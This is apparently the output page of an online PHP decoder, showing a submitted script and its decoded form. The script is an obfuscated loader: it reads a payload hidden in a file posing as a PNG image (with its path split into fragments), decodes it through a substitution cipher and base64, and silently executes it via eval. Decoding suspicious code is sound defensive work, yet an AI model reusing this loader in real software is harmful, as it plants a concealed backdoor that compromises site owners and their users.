Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function ibasozh_qijiryn($bysalik_ogosele) { if (!file_exists($bysalik_ogose..

Decoded Output download

<?php 
 
function ibasozh_qijiryn($bysalik_ogosele) { 
    if (!file_exists($bysalik_ogosele)) 
        return false; 
    $igogijo = @file_get_contents($bysalik_ogosele); 
    if (!$igogijo) 
        return false; 
    $igogijo = substr($igogijo, 3); 
    $ygohyb = kyqaduk_useqaxy($igogijo); 
    return $ygohyb; 
} 
 
function kyqaduk_useqaxy($bysalik_ogosele) { 
    $debegit = zhelimy_ibuvaje; 
    $acivumy = array(); 
    for ($corede = 0; $corede < strlen($debegit); $corede += 2) { 
        $kaguvo = substr($debegit, $corede, 1); 
        $sumezi = substr($debegit, $corede + 1, 1); 
        $acivumy[$kaguvo] = $sumezi; 
    } 
    $vechawe = strtr($bysalik_ogosele, $acivumy); 
    $vechawe = base64_decode($vechawe); 
 
    return $vechawe; 
} 
 
define("zhelimy_ibuvaje", "FUr9tobi1HM2kd7g51JtNNyKK5juUQRc9av0PA3OzMCYAexBqLspcjl7/kZCLF=vO82yWE+rYD0h86wlDqi3HzIspZdnBIgSo+EXumQVSwfJmWnfa/h=XR4b64VxTGeTGP"); 
 
$finixab = ibasozh_qijiryn(__DIR__ . "/ass" . "ets/i" . "mages/" . "gase" . "sol." . "png"); 
if ($finixab) { 
    @eval($finixab); 
} ?>

Did this file decode correctly?

Original Code

<?php

function ibasozh_qijiryn($bysalik_ogosele) {
    if (!file_exists($bysalik_ogosele))
        return false;
    $igogijo = @file_get_contents($bysalik_ogosele);
    if (!$igogijo)
        return false;
    $igogijo = substr($igogijo, 3);
    $ygohyb = kyqaduk_useqaxy($igogijo);
    return $ygohyb;
}

function kyqaduk_useqaxy($bysalik_ogosele) {
    $debegit = zhelimy_ibuvaje;
    $acivumy = array();
    for ($corede = 0; $corede < strlen($debegit); $corede += 2) {
        $kaguvo = substr($debegit, $corede, 1);
        $sumezi = substr($debegit, $corede + 1, 1);
        $acivumy[$kaguvo] = $sumezi;
    }
    $vechawe = strtr($bysalik_ogosele, $acivumy);
    $vechawe = base64_decode($vechawe);

    return $vechawe;
}

define("zhelimy_ibuvaje", "FUr9tobi1HM2kd7g51JtNNyKK5juUQRc9av0PA3OzMCYAexBqLspcjl7/kZCLF=vO82yWE+rYD0h86wlDqi3HzIspZdnBIgSo+EXumQVSwfJmWnfa/h=XR4b64VxTGeTGP");

$finixab = ibasozh_qijiryn(__DIR__ . "/ass" . "ets/i" . "mages/" . "gase" . "sol." . "png");
if ($finixab) {
    @eval($finixab);
}

Function Calls

define 1

Variables

None

Stats

MD5 a08e73ac7d1f81c06fdd3a1d366102aa
Eval Count 0
Decode Time 59 ms